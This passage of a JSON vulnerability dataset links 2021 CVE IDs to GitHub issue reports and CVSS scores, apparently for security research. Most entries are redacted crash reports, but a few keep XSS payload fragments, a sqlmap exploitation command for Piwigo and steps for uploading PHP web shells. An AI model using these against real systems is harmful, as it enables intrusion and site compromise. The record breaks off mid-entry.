  70533. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70534. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70535. "severity": "MEDIUM",
  70536. "baseScore": 5.5,
  70537. "impactScore": 3.6,
  70538. "exploitabilityScore": 1.8
  70539. },
  70540. {
  70541. "CVE_ID": "CVE-2021-39588",
  70542. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/131",
  70543. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/131",
  70544. "Repo_new": "matthiaskramm/swftools",
  70545. "Issue_Created_At": "2020-08-06T05:26:14Z",
  70546. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70547. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70548. "severity": "MEDIUM",
  70549. "baseScore": 5.5,
  70550. "impactScore": 3.6,
  70551. "exploitabilityScore": 1.8
  70552. },
  70553. {
  70554. "CVE_ID": "CVE-2021-39589",
  70555. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/132",
  70556. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/132",
  70557. "Repo_new": "matthiaskramm/swftools",
  70558. "Issue_Created_At": "2020-08-06T05:30:23Z",
  70559. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70560. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70561. "severity": "MEDIUM",
  70562. "baseScore": 5.5,
  70563. "impactScore": 3.6,
  70564. "exploitabilityScore": 1.8
  70565. },
  70566. {
  70567. "CVE_ID": "CVE-2021-39590",
  70568. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/137",
  70569. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/137",
  70570. "Repo_new": "matthiaskramm/swftools",
  70571. "Issue_Created_At": "2020-08-06T05:47:16Z",
  70572. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70573. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70574. "severity": "MEDIUM",
  70575. "baseScore": 5.5,
  70576. "impactScore": 3.6,
  70577. "exploitabilityScore": 1.8
  70578. },
  70579. {
  70580. "CVE_ID": "CVE-2021-39591",
  70581. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/135",
  70582. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/135",
  70583. "Repo_new": "matthiaskramm/swftools",
  70584. "Issue_Created_At": "2020-08-06T05:38:56Z",
  70585. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70586. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70587. "severity": "MEDIUM",
  70588. "baseScore": 5.5,
  70589. "impactScore": 3.6,
  70590. "exploitabilityScore": 1.8
  70591. },
  70592. {
  70593. "CVE_ID": "CVE-2021-39592",
  70594. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/138",
  70595. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/138",
  70596. "Repo_new": "matthiaskramm/swftools",
  70597. "Issue_Created_At": "2020-08-06T05:51:12Z",
  70598. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70599. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70600. "severity": "MEDIUM",
  70601. "baseScore": 5.5,
  70602. "impactScore": 3.6,
  70603. "exploitabilityScore": 1.8
  70604. },
  70605. {
  70606. "CVE_ID": "CVE-2021-39593",
  70607. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/139",
  70608. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/139",
  70609. "Repo_new": "matthiaskramm/swftools",
  70610. "Issue_Created_At": "2020-08-06T05:53:11Z",
  70611. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70612. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70613. "severity": "MEDIUM",
  70614. "baseScore": 5.5,
  70615. "impactScore": 3.6,
  70616. "exploitabilityScore": 1.8
  70617. },
  70618. {
  70619. "CVE_ID": "CVE-2021-39594",
  70620. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/142",
  70621. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/142",
  70622. "Repo_new": "matthiaskramm/swftools",
  70623. "Issue_Created_At": "2020-08-07T14:33:40Z",
  70624. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70626. "severity": "MEDIUM",
  70627. "baseScore": 5.5,
  70628. "impactScore": 3.6,
  70629. "exploitabilityScore": 1.8
  70630. },
  70631. {
  70632. "CVE_ID": "CVE-2021-39595",
  70633. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/141",
  70634. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/141",
  70635. "Repo_new": "matthiaskramm/swftools",
  70636. "Issue_Created_At": "2020-08-07T14:31:43Z",
  70637. "description": "A stack overflow in q.c NUMBERTAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70638. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70639. "severity": "HIGH",
  70640. "baseScore": 7.8,
  70641. "impactScore": 5.9,
  70642. "exploitabilityScore": 1.8
  70643. },
  70644. {
  70645. "CVE_ID": "CVE-2021-39596",
  70646. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/146",
  70647. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/146",
  70648. "Repo_new": "matthiaskramm/swftools",
  70649. "Issue_Created_At": "2020-08-07T14:43:02Z",
  70650. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70651. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70652. "severity": "MEDIUM",
  70653. "baseScore": 5.5,
  70654. "impactScore": 3.6,
  70655. "exploitabilityScore": 1.8
  70656. },
  70657. {
  70658. "CVE_ID": "CVE-2021-39597",
  70659. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/143",
  70660. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/143",
  70661. "Repo_new": "matthiaskramm/swftools",
  70662. "Issue_Created_At": "2020-08-07T14:35:45Z",
  70663. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70664. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70665. "severity": "MEDIUM",
  70666. "baseScore": 5.5,
  70667. "impactScore": 3.6,
  70668. "exploitabilityScore": 1.8
  70669. },
  70670. {
  70671. "CVE_ID": "CVE-2021-39598",
  70672. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/145",
  70673. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/145",
  70674. "Repo_new": "matthiaskramm/swftools",
  70675. "Issue_Created_At": "2020-08-07T14:40:34Z",
  70676. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70677. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70678. "severity": "MEDIUM",
  70679. "baseScore": 5.5,
  70680. "impactScore": 3.6,
  70681. "exploitabilityScore": 1.8
  70682. },
  70683. {
  70684. "CVE_ID": "CVE-2021-39599",
  70685. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
  70686. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
  70687. "Repo_new": "cbkhwx/cxuucmsv3",
  70688. "Issue_Created_At": "2021-08-21T06:09:44Z",
  70689. "description": "Two XSS vulnerabilities exist in the FILETAG file.",
  70690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70691. "severity": "MEDIUM",
  70692. "baseScore": 6.1,
  70693. "impactScore": 2.7,
  70694. "exploitabilityScore": 2.8
  70695. },
  70696. {
  70697. "CVE_ID": "CVE-2021-39602",
  70698. "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/1",
  70699. "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/1",
  70700. "Repo_new": "gabe-commiter/miniftpd",
  70701. "Issue_Created_At": "2021-08-22T10:26:19Z",
  70702. "description": "Buffer overflow problem. A buffer overflow exists in the APITAG function in the APITAG file. The saved frame pointer (rbp) is overwritten when the new path name length exceeds NUMBERTAG CODETAG",
  70703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  70704. "severity": "MEDIUM",
  70705. "baseScore": 6.5,
  70706. "impactScore": 3.6,
  70707. "exploitabilityScore": 2.8
  70708. },
  70709. {
  70710. "CVE_ID": "CVE-2021-39608",
  70711. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/52",
  70712. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/52",
  70713. "Repo_new": "flatcore/flatcore-cms",
  70714. "Issue_Created_At": "2021-08-13T03:50:15Z",
  70715. "description": "RCE via upload addons plugin. RCE via upload addon plugin It was identified that an authenticated user (admin) has the possibility to upload malicious files without any restriction. In this specific case, arbitrary server side PHP code such as web shells can be uploaded. As a result the attacker can run arbitrary code on the server side with the privileges of the web server. This could lead to a full system compromise. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS (admin user NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG or APITAG NUMBERTAG Choose a malicious PHP file (reverse shell, APITAG example is FILETAG NUMBERTAG URL for malicious PHP file: FILETAG Screenshots PoC for the vulnerability: URLTAG Desktop (please complete the following information): OS: tested in Linux Browser : All Version : Last version Additional context This vulnerability is extremely serious, affecting the whole system. An attacker holding administrator credentials can take control of the entire server.",
  70716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  70717. "severity": "HIGH",
  70718. "baseScore": 7.2,
  70719. "impactScore": 5.9,
  70720. "exploitabilityScore": 1.2
  70721. },
  70722. {
  70723. "CVE_ID": "CVE-2021-39609",
  70724. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/53",
  70725. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/53",
  70726. "Repo_new": "flatcore/flatcore-cms",
  70727. "Issue_Created_At": "2021-08-13T04:02:13Z",
  70728. "description": "Cross Site Scripting (XSS). Describe the bug Cross Site Scripting (XSS) via upload image function To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG file NUMBERTAG Drop svg file contains XSS payload , example filename : xss.svg NUMBERTAG and XSS in url : FILETAG Screenshots FILETAG xss.svg CODETAG Desktop (please complete the following information): OS: All Browser : All Version : Last version Additional context XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user",
  70729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70730. "severity": "MEDIUM",
  70731. "baseScore": 5.4,
  70732. "impactScore": 2.7,
  70733. "exploitabilityScore": 2.3
  70734. },
  70735. {
  70736. "CVE_ID": "CVE-2021-3962",
  70737. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4446",
  70738. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4446",
  70739. "Repo_new": "imagemagick/imagemagick",
  70740. "Issue_Created_At": "2021-11-06T05:20:44Z",
  70741. "description": "heap use after free in magick at dcm.c APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on OS: Ubuntu NUMBERTAG LTS Version: APITAG NUMBERTAG Q NUMBERTAG HDRI NUMBERTAG FILETAG Copyright: (C NUMBERTAG APITAG Studio Delegates (built in): fontconfig freetype jng jpeg lzma pangocairo png x xml zlib Compiler: gcc NUMBERTAG Description Hello, We are currently working on fuzz testing feature, and we found a heap use after free on magick . Steps to Reproduce build it APITAG run it APITAG output APITAG double free detected in tcache NUMBERTAG When I compile in ASAN mode APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f NUMBERTAG at pc NUMBERTAG f0f NUMBERTAG c bp NUMBERTAG ffe3d8a7fd0 sp NUMBERTAG ffe3d8a7fc8 READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG thread T NUMBERTAG f0f NUMBERTAG b in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb8 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG dfd NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  70742. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70743. "severity": "HIGH",
  70744. "baseScore": 7.8,
  70745. "impactScore": 5.9,
  70746. "exploitabilityScore": 1.8
  70747. },
  70748. {
  70749. "CVE_ID": "CVE-2021-40145",
  70750. "Issue_Url_old": "https://github.com/libgd/libgd/issues/700",
  70751. "Issue_Url_new": "https://github.com/libgd/libgd/issues/700",
  70752. "Repo_new": "libgd/libgd",
  70753. "Issue_Created_At": "2021-05-26T08:24:45Z",
  70754. "description": "APITAG memory leak. Hello, I found that APITAG in gd_gd.c and APITAG in gd_webp.c are similar functions for different picture formats. You have changed APITAG because of CVETAG (double free), So It seems that you need to change APITAG too. I run two test files with ASAN, and the result is shown below. The test files are located in the 'tests/webp' folder. Test1: CODETAG ASAN result: ERRORTAG Test2: CODETAG ASAN result: ERRORTAG Is there another CVE here?",
  70755. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70756. "severity": "HIGH",
  70757. "baseScore": 7.5,
  70758. "impactScore": 3.6,
  70759. "exploitabilityScore": 3.9
  70760. },
  70761. {
  70762. "CVE_ID": "CVE-2021-40153",
  70763. "Issue_Url_old": "https://github.com/plougher/squashfs-tools/issues/72",
  70764. "Issue_Url_new": "https://github.com/plougher/squashfs-tools/issues/72",
  70765. "Repo_new": "plougher/squashfs-tools",
  70766. "Issue_Created_At": "2019-09-10T17:09:19Z",
  70767. "description": "unsquashfs unvalidated filepaths allow writing outside of destination. Squashfs stores the filename in the directory entry, this is then used by ERRORTAG to create the new file during the unsquash. The filename is not validated for traversal outside of the destination directory, this allows writing to locations outside of the destination, such as APITAG which could lead to code execution. To test this, the following change can be made to mksquashfs : URLTAG ERRORTAG Recompile mksquashfs and then create the \"bad\" squashfs image. The first example is using a directory traversal, (this is easiest done in a Docker container) ERRORTAG This works pretty well since the ERRORTAG ends up prepending the file data to an existing file, or creating the file+path if it does not exist. The same can be done with a symlink. Same steps as before except additional file is added to the poc folder: APITAG Attached are two poc squashfs images, one with directory traversal and the other with symlink. Both will end up creating the file APITAG ERRORTAG Sample squashfs images FILETAG",
  70768. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  70769. "severity": "HIGH",
  70770. "baseScore": 8.1,
  70771. "impactScore": 5.2,
  70772. "exploitabilityScore": 2.8
  70773. },
  70774. {
  70775. "CVE_ID": "CVE-2021-40188",
  70776. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2372",
  70777. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2372",
  70778. "Repo_new": "phpfusion/phpfusion",
  70779. "Issue_Created_At": "2021-08-24T22:29:42Z",
  70780. "description": "File Manager does not filter php extension lead to Upload malicious files. By APITAG From In NUMBERTAG cta team, HPT Cyber Security Center Describe the bug File Manager function in admin panel does not filter all of php extensions like FILETAG , .php7, .phtml, .php5, ...\", The attacker can upload malicious file and execute code in server Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to administrator panel and click on APITAG function NUMBERTAG Click on Upload file button, then choose .php file NUMBERTAG The path of file will return in response NUMBERTAG Finally, access and execute code on server Screenshots FILETAG Request and response of function FILETAG Execute code on server: FILETAG Additional context Although APITAG have NUMBERTAG step verification for administrator panel, but if cookie of admin users were stolen, the attacker can POST request upload file with that cookie and execute code on server REQUEST: ERRORTAG RESPONSE: CODETAG",
  70781. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  70782. "severity": "HIGH",
  70783. "baseScore": 7.2,
  70784. "impactScore": 5.9,
  70785. "exploitabilityScore": 1.2
  70786. },
  70787. {
  70788. "CVE_ID": "CVE-2021-40191",
  70789. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/196",
  70790. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/196",
  70791. "Repo_new": "zyx0814/dzzoffice",
  70792. "Issue_Created_At": "2021-08-28T04:19:09Z",
  70793. "description": "Lacking of sanitizer APITAG lead to Cross site Scripting in Upload function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at all of upload functions in APITAG and return wrong response content type of output data in APITAG , The Authenticated user (not an admin) can injection malicious code into APITAG and craft a specific html file, then user click on that file the script will be executed. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any textarea form and use upload function NUMBERTAG Inject malicious script into APITAG like <img src=x onerror=alert NUMBERTAG Craft an specific html file to send request to server in webclient, when user click on that file malicious script will be executed Request ERRORTAG IMAGE FILETAG FILETAG FILETAG FILETAG Response ERRORTAG",
  70794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70795. "severity": "MEDIUM",
  70796. "baseScore": 5.4,
  70797. "impactScore": 2.7,
  70798. "exploitabilityScore": 2.3
  70799. },
  70800. {
  70801. "CVE_ID": "CVE-2021-4021",
  70802. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19436",
  70803. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19436",
  70804. "Repo_new": "radareorg/radare2",
  70805. "Issue_Created_At": "2021-11-23T14:42:29Z",
  70806. "description": "APITAG analysing ELF NUMBERTAG binary for MIPS architecture. Environment ERRORTAG Description We found with MENTIONTAG an ELF NUMBERTAG binary for MIPS architecture that hangs when analysed. We think this is caused by mapping a huge section that is interpreted as NOPs. If we modify the size of the section, the analysis doesn't hang. While this is not an infinite loop, it can be very long. And this has been acknowledged as a APITAG in the past (see NUMBERTAG Test CODETAG APITAG ERRORTAG ERRORTAG CODETAG",
  70807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70808. "severity": "HIGH",
  70809. "baseScore": 7.5,
  70810. "impactScore": 3.6,
  70811. "exploitabilityScore": 3.9
  70812. },
  70813. {
  70814. "CVE_ID": "CVE-2021-40239",
  70815. "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/2",
  70816. "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/2",
  70817. "Repo_new": "gabe-commiter/miniftpd",
  70818. "Issue_Created_At": "2021-08-24T18:07:12Z",
  70819. "description": "APITAG trigger buffer overflow on APITAG function. Hi MENTIONTAG I found an issue, that can trigger buffer overflow on your application. The issue exists on APITAG function (from line NUMBERTAG to NUMBERTAG on ftpproto.c At glance, we can see you defined APITAG , it's not a problem, however, when you use APITAG on line NUMBERTAG and NUMBERTAG they trigger buffer overflow. ERRORTAG ERRORTAG Solution : Please use APITAG to limit maximum input characters. See: URLTAG",
  70820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  70821. "severity": "CRITICAL",
  70822. "baseScore": 9.8,
  70823. "impactScore": 5.9,
  70824. "exploitabilityScore": 3.9
  70825. },
  70826. {
  70827. "CVE_ID": "CVE-2021-40292",
  70828. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/195",
  70829. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/195",
  70830. "Repo_new": "zyx0814/dzzoffice",
  70831. "Issue_Created_At": "2021-08-28T04:05:10Z",
  70832. "description": "Lacking of sanitizer of input data lead to Stored XSS. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data, attacker can injection malicious code into settingnew param to trigger Stored XSS. The vulnerability can affected APITAG and APITAG in template FILETAG FILETAG XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Go to Setting settings > Login settings NUMBERTAG Update Registration link name to APITAG NUMBERTAG Click Save changes Request CODETAG Response ERRORTAG APITAG FILETAG FILETAG",
  70833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70834. "severity": "MEDIUM",
  70835. "baseScore": 5.4,
  70836. "impactScore": 2.7,
  70837. "exploitabilityScore": 2.3
  70838. },
  70839. {
  70840. "CVE_ID": "CVE-2021-40313",
  70841. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1469",
  70842. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1469",
  70843. "Repo_new": "piwigo/piwigo",
  70844. "Issue_Created_At": "2021-08-29T05:50:52Z",
  70845. "description": "FILETAG then i got APITAG The point of vulnerability is in APITAG parameter selection is not filtered FILETAG Unfiltered parametersselection is spliced FILETAG The next step is to capture packets using APITAG by simply constructing parameters APITAG Remember to replace the value of the token above FILETAG Save parameters to file\uff0cthen just use sqlmap to exploit python sqlmap.py r NUMBERTAG current db FILETAG",
  70846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  70847. "severity": "HIGH",
  70848. "baseScore": 8.8,
  70849. "impactScore": 5.9,
  70850. "exploitabilityScore": 2.8
  70851. },
  70852. {
  70853. "CVE_ID": "CVE-2021-40317",
  70854. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1470",
  70855. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1470",
  70856. "Repo_new": "piwigo/piwigo",
  70857. "Issue_Created_At": "2021-08-29T13:49:36Z",
  70858. "description": "FILETAG Then we can see: FILETAG Select default, use Burpsuite during clicking APPLY. FILETAG Then in sqlmap: python sqlmap.py r FILETAG o APITAG FILETAG See APITAG FILETAG Here there seems to be no confirmation of the legitimacy of the parameter $_POST FILETAG",
  70859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  70860. "severity": "HIGH",
  70861. "baseScore": 8.8,
  70862. "impactScore": 5.9,
  70863. "exploitabilityScore": 2.8
  70864. },
  70865. {
  70866. "CVE_ID": "CVE-2021-4048",
  70867. "Issue_Url_old": "https://github.com/JuliaLang/julia/issues/42415",
  70868. "Issue_Url_new": "https://github.com/julialang/julia/issues/42415",
  70869. "Repo_new": "julialang/julia",
  70870. "Issue_Created_At": "2021-09-28T18:29:48Z",
  70871. "description": "stegr! call segfault. MENTIONTAG alerted us to segfaults that were occurring on some machines during CI builds while running the APITAG test. Using rr, we were able to trace these segfaults back to a call to APITAG in lapack.jl URLTAG While we ran out of time to fully debug and fix this, we have a MWE that replicates the problem on AMD machines. Here's the MWE: CODETAG CC: MENTIONTAG",
  70872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  70873. "severity": "CRITICAL",
  70874. "baseScore": 9.1,
  70875. "impactScore": 5.2,
  70876. "exploitabilityScore": 3.9
  70877. },
  70878. {
  70879. "CVE_ID": "CVE-2021-40523",
  70880. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2686",
  70881. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2686",
  70882. "Repo_new": "contiki-os/contiki",
  70883. "Issue_Created_At": "2021-08-08T13:42:02Z",
  70884. "description": "Incorrectly handling negotiated options of telnet servers. Hello, In the implementation of telnet servers until version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG telnet servers incorrectly handle negotiated options. According to the general constraints of RFC NUMBERTAG URLTAG , during negotiating some disabled command options or unnegotiated commands, telnet servers must give WILL/WONT or DO/DONT response for DO and WILL commands, respectively. However, telnet servers may not give any responses in this case. This bug appears as telnet servers put all responses in a fixed length buffer in the implementation. Telnet servers only put messages into buffer but don't have a check whether successfully or not. Hence, when the buffer is full, it can lead to responses lost. This bug could lead to clients waiting forever and other effects. Could you have a check? Thanks a lot.",
  70885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70886. "severity": "HIGH",
  70887. "baseScore": 7.5,
  70888. "impactScore": 3.6,
  70889. "exploitabilityScore": 3.9
  70890. },
  70891. {
  70892. "CVE_ID": "CVE-2021-40541",
  70893. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2373",
  70894. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2373",
  70895. "Repo_new": "phpfusion/phpfusion",
  70896. "Issue_Created_At": "2021-08-25T03:33:12Z",
  70897. "description": "Cross site Scripting bypass in APITAG function. APITAG From In NUMBERTAG cta Team, HPT Cyber Security Center Describe the bug preg patterns filter html tag without \"//\" in APITAG function, the authenticated user can trigger xss by append \"//\" in the end of text Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any post textarea function NUMBERTAG Add \"<svg onload=alert NUMBERTAG in textarea form and submit NUMBERTAG When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission Screenshots preg pattern filter html tag without \"//\" in the end of html FILETAG User preview and submit submission FILETAG Admin preview submission of user FILETAG Admin publish submission and the attacker can store malicious script FILETAG Additional context REQUEST: CODETAG RESPONSE: CODETAG",
  70898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70899. "severity": "MEDIUM",
  70900. "baseScore": 6.1,
  70901. "impactScore": 2.7,
  70902. "exploitabilityScore": 2.8
  70903. },
  70904. {
  70905. "CVE_ID": "CVE-2021-40542",
  70906. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/189",
  70907. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/189",
  70908. "Repo_new": "os4ed/opensis-classic",
  70909. "Issue_Created_At": "2021-09-01T09:41:11Z",
  70910. "description": "Unauthenticated Reflected Cross site Scripting in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at APITAG in APITAG file, The Unauthenticated user can inject and execute javascript code on APITAG parameter FILETAG Testing on local site: FILETAG Testing on demo site: FILETAG To Reproduce XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Access APITAG file NUMBERTAG Add APITAG behind APITAG file NUMBERTAG The backend will echo and execute malicious script Request ERRORTAG Response ERRORTAG",
  70911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70912. "severity": "MEDIUM",
  70913. "baseScore": 6.1,
  70914. "impactScore": 2.7,
  70915. "exploitabilityScore": 2.8
  70916. },
  70917. {
  70918. "CVE_ID": "CVE-2021-40543",
